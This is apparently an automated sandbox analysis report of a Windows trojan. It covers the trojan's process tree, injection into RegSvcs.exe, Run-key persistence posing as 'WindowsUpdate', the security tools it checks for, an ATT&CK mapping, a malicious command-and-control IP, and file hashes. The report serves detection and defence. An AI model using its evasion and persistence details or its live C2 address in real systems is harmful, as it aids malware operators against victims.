Source: Yara match | File source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2800, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023034016.000000000160F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2022211718.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021396423.00000000015EE000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021523014.00000000015F5000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021288890.000000000158F000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021220494.000000000158B000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2023014076.00000000015FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: RegSvcs.exe, 0000000C.00000002.4091188698.000000000187C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: cipkucw.ppt.exe, 00000011.00000003.2165739179.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2166399836.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000002.2168766408.0000000000BEB000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165802750.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2167635107.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165513335.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          Source: cipkucw.ppt, 00000006.00000002.1902115604.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894957701.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1895348993.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240621163.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240877457.0000000001704000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240251372.0000000001699000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2242293917.0000000001706000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000002.2243302839.0000000001708000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240734384.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2240529759.000000000169A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: cipkucw.ppt.exe | Binary or memory string: WIN_81
Source: cipkucw.ppt.exe | Binary or memory string: WIN_XP
          Source: cipkucw.ppt.exe.6.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: cipkucw.ppt.exe | Binary or memory string: WIN_XPe
Source: cipkucw.ppt.exe | Binary or memory string: WIN_VISTA
Source: cipkucw.ppt.exe | Binary or memory string: WIN_7
Source: cipkucw.ppt.exe | Binary or memory string: WIN_8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00772163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00772163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00771B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_00771B61
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_01042163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,15_2_01042163
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Code function: 15_2_01041B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,15_2_01041B61
MITRE ATT&CK Matrix (one row per line; cells separated by " | "; a number in front of a technique is the count shown next to it in the report)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 121 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 21 Access Token Manipulation | 11 Software Packing | NTDS | 37 System Information Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 312 Process Injection | 1 DLL Side-Loading | LSA Secrets | 361 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 11 Masquerading | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 2 Valid Accounts | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 131 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 312 Process Injection | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph

Behavior Graph ID: 1582904 | Sample: yjOJ1YK5M3.exe | Startdate: 31/12/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures

Process tree as drawn in the graph (indentation shows parent/child; the numbers in parentheses are the per-process counts displayed beside each node, see the legend above; "dropped" lines are files written by that process; "network" is the contacted endpoint):

yjOJ1YK5M3.exe (3 35)
    dropped: C:\Users\user\AppData\Local\...\cipkucw.ppt, PE32
    dropped: C:\Users\user\AppData\Local\Temp\...\pgoh.vbe, Unicode
    signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    wscript.exe (1)
        signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
        cmd.exe (1)
            cipkucw.ppt (1 33)
                dropped: C:\Users\user\AppData\...\cipkucw.ppt.exe, PE32
                dropped: C:\Users\user\AppData\Local\...\cipkucw.ppt, PE32
                dropped: C:\Users\user\AppData\...\cipkucw.ppt.exe, PE32
                dropped: 2 other files (1 malicious)
                signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                RegSvcs.exe (3)
                    network: 195.26.255.81, 2106, 49737 KCOM-SPNService-ProviderNetworkex-MistralGB United Kingdom
                    signatures: Protects its processes via BreakOnTermination flag; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            conhost.exe
        cmd.exe (1)
            signature: Uses ipconfig to lookup or modify the Windows network settings
            conhost.exe
            ipconfig.exe (1)
        cmd.exe (1)
            conhost.exe
            ipconfig.exe (1)
cipkucw.ppt.exe (1 1)
    dropped: C:\Users\user\AppData\...\cipkucw.ppt.exe.exe, PE32
    signatures: Found API chain indicative of sandbox detection; Writes to foreign memory regions; Allocates memory in foreign processes
    RegSvcs.exe (3)
cipkucw.ppt.exe
    signature: Injects a PE file into a foreign processes
    RegSvcs.exe
cipkucw.ppt.exe
    RegSvcs.exe

Antivirus detection for the submitted file:
• Source: yjOJ1YK5M3.exe, Detection: 62%, Scanner: ReversingLabs, Label: Win32.Trojan.Runner
Antivirus detection for dropped files:
• Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt.exe, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe, Detection: 0%, Scanner: ReversingLabs
• Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe.exe, Detection: 0%, Scanner: ReversingLabs
No Antivirus matches
Antivirus detection for URLs:
• Source: http://schemas.microO, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
          No contacted domains info
URLs from memory and binaries:
• Name: http://www.autoitscript.com/autoit3/J
  Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000000.1778450819.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000002.2022650449.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000011.00000002.2169095460.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.exe, 00000013.00000000.2151242199.0000000001095000.00000002.00000001.01000000.0000000E.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr
  Malicious: false
  Reputation: high
• Name: http://schemas.microO
  Source: cipkucw.ppt.exe, 00000011.00000003.2160334326.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160509508.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2139352487.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown
• Name: https://www.autoitscript.com/autoit3/
  Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1828917683.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1956923132.0000000001658000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.0.dr, cipkucw.ppt.exe.exe.15.dr, cipkucw.ppt.6.dr, cipkucw.ppt.exe0.6.dr, cipkucw.ppt.exe.6.dr
  Malicious: false
  Reputation: high
• Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: RegSvcs.exe, 0000000C.00000002.4092763243.0000000003721000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
Contacted IPs:
• IP: 195.26.255.81, Domain: unknown, Country: United Kingdom, ASN: 8897, ASN Name: KCOM-SPNService-ProviderNetworkex-MistralGB, Malicious: true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1582904
                Start date and time:2024-12-31 20:25:19 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:yjOJ1YK5M3.exe
                renamed because original name is a hash value
                Original Sample Name:7B17EBBF77F53472D2FEBB38E9785026.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@29/61@0/1
                EGA Information:
                • Successful, ratio: 57.1%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 179
                • Number of non-executed functions: 225
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target RegSvcs.exe, PID 2368 because it is empty
                • Execution Graph export aborted for target RegSvcs.exe, PID 6668 because it is empty
                • Execution Graph export aborted for target RegSvcs.exe, PID 6852 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • VT rate limit hit for: yjOJ1YK5M3.exe
Timeline:
• Time: 14:26:24, Type: API Interceptor, Description: 1x Sleep call for process: yjOJ1YK5M3.exe modified
• Time: 14:27:07, Type: API Interceptor, Description: 7504018x Sleep call for process: RegSvcs.exe modified
• Time: 19:26:28, Type: Autostart, Description: Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
• Time: 19:26:41, Type: Autostart, Description: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
• Time: 19:26:49, Type: Autostart, Description: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\afda\CIPKUC~1.EXE C:\Users\user\AppData\Local\Temp\afda\xdgrnj.pdf
IP context:
• Match: 195.26.255.81, Associated Sample Name / URL: QHLQyYBiH7.exe, Detection: malicious, Threat Name: AsyncRAT
                  No context
ASN context (Match: KCOM-SPNService-ProviderNetworkex-MistralGB):
• Associated Sample Name / URL: u233hvgTow.exe, Detection: malicious, Threat Name: RedLine, Context: 212.56.41.77
• Associated Sample Name / URL: Set-up.exe, Detection: malicious, Threat Name: LummaC, GO Backdoor, LummaC Stealer, Context: 195.200.31.22
• Associated Sample Name / URL: xd.x86.elf, Detection: malicious, Threat Name: Mirai, Context: 194.164.201.126
• Associated Sample Name / URL: 0Ty.png.exe, Detection: malicious, Threat Name: Xmrig, Context: 194.164.234.171
• Associated Sample Name / URL: https://a41c415c7bccad129d61b50d2032009e.aktive-senioren.biz/de/st/1?#bqcnl4tocgzq65tck3bv, Detection: malicious, Threat Name: Unknown, Context: 194.164.200.113
• Associated Sample Name / URL: ub8ehJSePAfc9FYqZIT6.arm.elf, Detection: malicious, Threat Name: Mirai, Context: 195.26.252.19
• Associated Sample Name / URL: ub8ehJSePAfc9FYqZIT6.sh4.elf, Detection: malicious, Threat Name: Unknown, Context: 195.26.252.19
• Associated Sample Name / URL: ub8ehJSePAfc9FYqZIT6.ppc.elf, Detection: malicious, Threat Name: Unknown, Context: 195.26.252.19
• Associated Sample Name / URL: ub8ehJSePAfc9FYqZIT6.m68k.elf, Detection: malicious, Threat Name: Mirai, Context: 195.26.252.19
• Associated Sample Name / URL: ub8ehJSePAfc9FYqZIT6.arm7.elf, Detection: malicious, Threat Name: Mirai, Context: 195.26.252.19
                  No context
Dropped file context (Match: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt):
• Associated Sample Name / URL: Rage.exe, Detection: malicious, Threat Name: Unknown
• Associated Sample Name / URL: Rage.exe, Detection: malicious, Threat Name: Unknown
• Associated Sample Name / URL: copia111224mp.hta, Detection: malicious, Threat Name: Unknown
• Associated Sample Name / URL: FX6KTgnipP.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample Name / URL: uhbrQkYNzx.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample Name / URL: qPLzfnxGbj.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample Name / URL: ngPebbPhbp.exe, Detection: malicious, Threat Name: RHADAMANTHYS
• Associated Sample Name / URL: FS04dlvJrq.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample Name / URL: M1Y6kc9FpE.exe, Detection: malicious, Threat Name: FormBook
• Associated Sample Name / URL: mJIvCBk5vF.exe, Detection: malicious, Threat Name: FormBook
                                      Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):425
                                      Entropy (8bit):5.353683843266035
                                      Encrypted:false
                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                      Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):35
                                      Entropy (8bit):3.7071562309216133
                                      Encrypted:false
                                      SSDEEP:3:rRSFYJKXzovNsr4rn:EFYJKDoWrcn
                                      MD5:BFABEC865892A34F532FABF984F7E156
                                      SHA1:3C8292E49FEFD3DA96DBC289B36C4C710B0127E3
                                      SHA-256:8C8E36E0088165B6606F75DF86D53D3527FD36518C5AAB07425969B066FEEEC6
                                      SHA-512:CA042E157B8C0E728991567016DF2036D8E6E4311CC74E7DB8AB6335AC20C02BD8099F3248E82B8DB5C26A7C6B687D1D7A440EC77D55B3BAE42D3753DBD63129
                                      Malicious:false
                                      Preview:....### explorer ###..[WIN]r[WIN]r
                                      Process:C:\Users\user\Desktop\yjOJ1YK5M3.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):537
                                      Entropy (8bit):5.605243272883823
                                      Encrypted:false
                                      SSDEEP:12:FjfgTkvCgqvvhYuZaSsOGKrCTMYWHKGg5erBP1j9RviwdxQAFPL:FjmkvCgqxYuZkYCIYU0erplDdxH
                                      MD5:F982A60E5F1B14C79FC141B895CC766C
                                      SHA1:2ECC98EA11167D0692D64FEB812E1E648503EA4A
                                      SHA-256:E019E67A0F7EC0696FEBB0DC7C6BCC727AAE6079AC6AD3FA23E7BF8A099214AA
                                      SHA-512:9E1CD62BA25C58E71D7639451C61EE9552EABA25E1E2E969ECC1E3C21DF1D339B939B2E1952142D2EB1A2969D494272FC8C391F01F9438B770CD227ADC4FFE96
                                      Malicious:false
                                      Preview:Sia21q25..ToolbarConstants BorderConstants..98xRq36y95DaGzM1R0H259..UpDownConstants FontConstants..rA024c9ph4V27w6hVjcX7912W9CkI92S37nZveKVW85fRN3A20Oaz79WTa46478128ThL65z8d6VuQnQ7y4I131B7768UWwm15Z6CwIk8174Hl54V9oG2a1K23V3v1N50t4FRC1301Jmg1g0d1695ZL29uL6gxbsV89TIR6181SZOD..BorderConstants ToolTipConstants..pb035oc34YhgKP947PsExG664m5t27X225wN0140es87e54rsE884Wvz5zj3OjVan67gUx6..StructureConstants TreeViewConstants..4Uz182p4p9QT986y4V7B8vZ1ixymR57JOv0m0c7QJuwORt79oC7T2F65NGv3qbbDLOLpl4sx8NT5438v..TreeViewConstants ButtonConstants..
